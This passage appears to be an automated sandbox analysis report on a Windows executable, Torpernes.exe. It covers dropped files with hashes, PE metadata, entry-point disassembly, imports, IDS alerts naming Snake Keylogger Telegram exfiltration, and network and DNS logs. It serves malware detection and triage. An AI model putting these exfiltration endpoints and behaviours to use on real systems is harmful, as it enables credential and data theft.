Malicious: | true |
Reputation: | high, very likely benign file |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54418 |
Entropy (8bit): | 5.380872173369229 |
Encrypted: | false |
SSDEEP: | 1536:AsNKLSSANLNd+FFzONIjxMoqrnDlHIgiRYX3sJkLOcY:AFLSPE1MEI7K1YX3u0OcY |
MD5: | B77B0DEE3BF32770AF375C4C87E19478 |
SHA1: | D97F7CF179F27860AC856437F256D8A473497472 |
SHA-256: | 05CB2B925D951BF1348C00B0B69B21E9EA7F8C4F3022636E89EED64C043BAF78 |
SHA-512: | 2A389AF9BBC0A656F4FC1249E4F2ABDA08C578B54AB141308836D246BA9AE8CC9268E4182147692530EA39484BC794184321C355821654E39CC771B18D500A65 |
Malicious: | true |
Reputation: | low |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Sildefdnings.pre
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328797 |
Entropy (8bit): | 7.815397462071498 |
Encrypted: | false |
SSDEEP: | 6144:gRGYT84P6OIpXGZP31SmNYayhBJxWj9DlcK77hA456in:MT84COSsFSdaCxYn |
MD5: | 6CA54912856A504C6D0347BD9B57DDFD |
SHA1: | 7C9354362785D249DF664498EAD9AE7246F244FE |
SHA-256: | 0E91233482A61EB85E81D38C4E838E7B2157A27431CF6180BDBD4B995C35AAFA |
SHA-512: | D5F868C39390B2AE6A571292F96B802D0401B3F57607B6769D3B566DC6E632CB61036372142930F51746785C03EA0EE31C69BF4B3351E718A093879BFB77D7B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\genfortl.kom
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 944215 |
Entropy (8bit): | 1.253403336418641 |
Encrypted: | false |
SSDEEP: | 1536:UyGaAJZQVIsL4WNkRjeGXJIp9Oc52NVuN75fZTD5p1v5E1bkGgMF/3tDLREMUPS+:UyGxUL4a6vXJIWhru791ublLeDPS0ASD |
MD5: | 1CB1238607E8954A7923966A49CDB3E0 |
SHA1: | BFF6A1E896BB0BE28E1BFCFD0094BCD36078D849 |
SHA-256: | 6A76541EE87E4E7E547F500D01CC9D50EE681DBF067FE8D4E5735F5BD22AC999 |
SHA-512: | 4B691C9C24C15DA18B9C3F221333692F1CA364B96765AE94EC01FD2BF004449A57DDE3E6E89B8A567DA2FC05F53BA7FBA853AC8B367F298A1C444CCC5F3DAE5F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\leucocythaemia.lob
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 962689 |
Entropy (8bit): | 1.2611239746227794 |
Encrypted: | false |
SSDEEP: | 3072:3wRHrOD/R6APMwv2g5tvYRY0zgsRVL7YapsU7:3KHri/3P20wRB8CYE77 |
MD5: | 5318799C0891E41C4824B117782D972C |
SHA1: | B7708ECD85A69E6158EA05A6B5BDC1B8CE826199 |
SHA-256: | 254A5A9B8B3F20A38A993C62D3F16EE3F7D98176769F97C58248C27C77A4C032 |
SHA-512: | 9AA1B82B35C17D11B57749B399F4280F2D2FD111AA8523E1FA7CB82DBAC3A968F3CBE09310B4A592550517CC10F2EDCE63F919AE1399FD8160D55B0A8E65866E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\teknonom.txt
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 258 |
Entropy (8bit): | 4.211163838509549 |
Encrypted: | false |
SSDEEP: | 6:zDW+YfJM8yFa2cip84JmfABwvPDOrCK6ZLtpAS/cV0rg1CkFL:ChMzFa2cip8MDwvPDOrXS4Ag1C+L |
MD5: | 17EACC32277AC454B9E9981F5E3EA80B |
SHA1: | 6D18F25A482B59AB8AC0D485D9594A147320B396 |
SHA-256: | C03BC7EDD150C4DC8A88F160D8863489F09AACEE6F9CE5071E0D962332522A6C |
SHA-512: | 2854AE7B957D8DD01436DB85587E61B348990452E546785C907A50CE0253338CAA1CA268800426243B35C11BDAA32CFC8115A1FC8F4E9081B8DA36822CD107A7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\discontiguous.alk
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 802681 |
Entropy (8bit): | 1.2504268364374471 |
Encrypted: | false |
SSDEEP: | 1536:NKhLrR2iZCjGIP8dRVIVuLWjmO7fg7RKVFw+UPDsVTWD04FMUtdmTWO5XQc/G9vp:URN2sRoTzFB6D046UOPJu9vvio |
MD5: | 176BA5DE5FE97864B7468DD8BCE8C38E |
SHA1: | 01804C24EDC45329980BF040FCF8EFFFAF4B471D |
SHA-256: | 84DFBA8A9B3F62629795FA225C836FDCD3708595325E98F6248E3C72A4DD6C9B |
SHA-512: | EC9E44DA08D30FC5241BB06792127530993B038A1B0C20A546241EAD3663AFCFD2E4C02F73465A0723E1D9E7DF10FCB6C19888776911C49F646ABF6EB5E70254 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.384565087462512 |
TrID: | |
File name: | Torpernes.exe |
File size: | 1'283'968 bytes |
MD5: | ecc4ff0ee7d123f0e90587ea3a7b9ae3 |
SHA1: | 70e6f747f9bae57619817beb11f836fa8a873726 |
SHA256: | 1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83 |
SHA512: | 28f1d457d0a8556cf0bd62fc33556b22d3307e0527a25d451877bcaa9b76b1595d5170e5a221491007d2e8ca5e3a5f384c556f40830576dc942aa0252dbe8a71 |
SSDEEP: | 24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+ |
TLSH: | 0655D0153A49890ED2936B788E58F37A5764DFCD3A16830296F0CDB7F9ACD8BAD405C0 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................^...*.......1.......p....@ |
Icon Hash: | 49f571b3129a9201 |
Entrypoint: | 0x4031ff |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x55C15CE0 [Wed Aug 5 00:46:24 2015 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 7ed0d71376e55d58ab36dc7d3ffda898 |
Signature Valid: | false |
Signature Issuer: | CN="Vicegerents Nolendes ", O=Slvknappede, L=Rockwood, S=Michigan, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After: | |
Subject Chain: | |
Version: | 3 |
Thumbprint MD5: | 8F6ED964E29B10521097F5E1F2D31785 |
Thumbprint SHA-1: | 022CE78AA85D6D20EF075D7499744D4516AADF30 |
Thumbprint SHA-256: | E3E76A1533813ED1A2A55533A06A026F62239ED962B809E576E401949A4C3B91 |
Serial: | 0F4BC7A006DB1332596FDFB90A31A28AB0444F58 |
Instruction |
---|
sub esp, 000002D8h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+18h], ebp |
mov dword ptr [esp+10h], 004092D8h |
mov dword ptr [esp+14h], ebp |
call dword ptr [00407034h] |
push 00008001h |
call dword ptr [00407134h] |
push ebp |
call dword ptr [004072ACh] |
push 00000009h |
mov dword ptr [00429278h], eax |
call 00007F956115D836h |
mov dword ptr [004291C4h], eax |
push ebp |
lea eax, dword ptr [esp+38h] |
push 000002B4h |
push eax |
push ebp |
push 00420670h |
call dword ptr [0040717Ch] |
push 004092C0h |
push 004281C0h |
call 00007F956115D4A1h |
call dword ptr [00407138h] |
mov ebx, 00434000h |
push eax |
push ebx |
call 00007F956115D48Fh |
push ebp |
call dword ptr [0040710Ch] |
push 00000022h |
mov dword ptr [004291C0h], eax |
pop edi |
mov eax, ebx |
cmp word ptr [00434000h], di |
jne 00007F956115A8F9h |
mov esi, edi |
mov eax, 00434002h |
push esi |
push eax |
call 00007F956115CEDFh |
push eax |
call dword ptr [00407240h] |
mov ecx, eax |
mov dword ptr [esp+1Ch], ecx |
jmp 00007F956115A9EBh |
push 00000020h |
pop edx |
cmp ax, dx |
jne 00007F956115A8F9h |
inc ecx |
inc ecx |
cmp word ptr [ecx], dx |
Programming Language: | |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x69fd8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x138e20 | 0x960 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5d98 | 0x5e00 | 60fc9e652ab60b696b4471d2d740a415 | False | 0.6669714095744681 | data | 6.471759151304203 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x1354 | 0x1400 | 2f90a087fd075d2b61c65e6db9ea1417 | False | 0.4314453125 | data | 5.037502749366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x202b8 | 0x600 | 76eba87d06ba726298375b77b72945b6 | False | 0.4733072916666667 | data | 3.7505342023618717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2a000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x4f000 | 0x69fd8 | 0x6a000 | ba23276a82e0d244e1672be1b2a31f09 | False | 0.5017619582841981 | data | 5.158881628031345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x4f328 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.4722756457673758 |
RT_ICON | 0x91350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.5095676091328523 |
RT_ICON | 0xa1b78 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.5717626655455119 |
RT_ICON | 0xab020 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.583641404805915 |
RT_ICON | 0xb04a8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.5690836088804913 |
RT_ICON | 0xb46d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6310165975103734 |
RT_ICON | 0xb6c78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.651735459662289 |
RT_ICON | 0xb7d20 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.7151639344262295 |
RT_DIALOG | 0xb86a8 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0xb87a8 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0xb88c8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0xb8928 | 0x76 | data | English | United States | 0.7372881355932204 |
RT_VERSION | 0xb89a0 | 0x2f8 | data | English | United States | 0.4986842105263158 |
RT_MANIFEST | 0xb8c98 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447 |
DLL | Import |
---|---|
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte |
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
2024-07-25T09:56:55.795858+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
2024-07-25T09:56:44.263078+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
2024-07-25T09:57:07.855040+0200 | TCP | 2853006 | ETPRO MALWARE Snake Keylogger Telegram Exfil | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
2024-07-25T09:56:49.886487+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
2024-07-25T09:56:51.785131+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49742 | 13.85.23.86 | 192.168.2.4 |
2024-07-25T09:56:47.794238+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
2024-07-25T09:56:47.325602+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
2024-07-25T09:56:12.458951+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49730 | 40.127.169.103 | 192.168.2.4 |
2024-07-25T09:56:41.888830+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
2024-07-25T09:56:53.587006+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 25, 2024 09:56:59.167088032 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:59.167195082 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:59.167306900 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:59.167748928 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:59.171415091 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.172591925 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.176822901 CEST | 80 | 49749 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:59.176882029 CEST | 49749 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.177613020 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:59.177685022 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.177807093 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:59.182528019 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:00.643740892 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:00.646431923 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:00.646481037 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:00.646560907 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:00.647186041 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:00.647197962 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:00.685147047 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:57:01.142071962 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.144854069 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:01.144891024 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.269419909 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.269666910 CEST | 443 | 49752 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:57:01.269736052 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:01.270793915 CEST | 49752 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:57:06.912273884 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:57:06.917759895 CEST | 80 | 49751 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:06.917870998 CEST | 49751 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:57:06.920337915 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:06.920388937 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:06.920466900 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:06.921019077 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:06.921031952 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.555932999 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.556080103 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.558072090 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.558090925 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.558332920 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.559920073 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.604506969 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.604892015 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.604907990 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.855132103 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.855304956 CEST | 443 | 49753 | 149.154.167.220 | 192.168.2.4 |
Jul 25, 2024 09:57:07.855400085 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:07.856005907 CEST | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
Jul 25, 2024 09:57:54.658999920 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:57:54.660269976 CEST | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 25, 2024 09:56:37.145128012 CEST | 63412 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:56:37.404407024 CEST | 53 | 63412 | 1.1.1.1 | 192.168.2.4 |
Jul 25, 2024 09:56:43.295393944 CEST | 54397 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:56:43.302406073 CEST | 53 | 54397 | 1.1.1.1 | 192.168.2.4 |
Jul 25, 2024 09:56:44.880415916 CEST | 54894 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:56:44.888578892 CEST | 53 | 54894 | 1.1.1.1 | 192.168.2.4 |
Jul 25, 2024 09:57:06.912903070 CEST | 49208 | 53 | 192.168.2.4 | 1.1.1.1 |
Jul 25, 2024 09:57:06.919586897 CEST | 53 | 49208 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jul 25, 2024 09:56:37.145128012 CEST | 192.168.2.4 | 1.1.1.1 | 0x7de6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 25, 2024 09:56:43.295393944 CEST | 192.168.2.4 | 1.1.1.1 | 0xf222 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 25, 2024 09:56:44.880415916 CEST | 192.168.2.4 | 1.1.1.1 | 0xb28f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 25, 2024 09:57:06.912903070 CEST | 192.168.2.4 | 1.1.1.1 | 0x180e | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jul 25, 2024 09:56:37.404407024 CEST | 1.1.1.1 | 192.168.2.4 | 0x7de6 | No error (0) | 185.98.5.168 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:44.888578892 CEST | 1.1.1.1 | 192.168.2.4 | 0xb28f | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:56:44.888578892 CEST | 1.1.1.1 | 192.168.2.4 | 0xb28f | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Jul 25, 2024 09:57:06.919586897 CEST | 1.1.1.1 | 192.168.2.4 | 0x180e | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49737 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
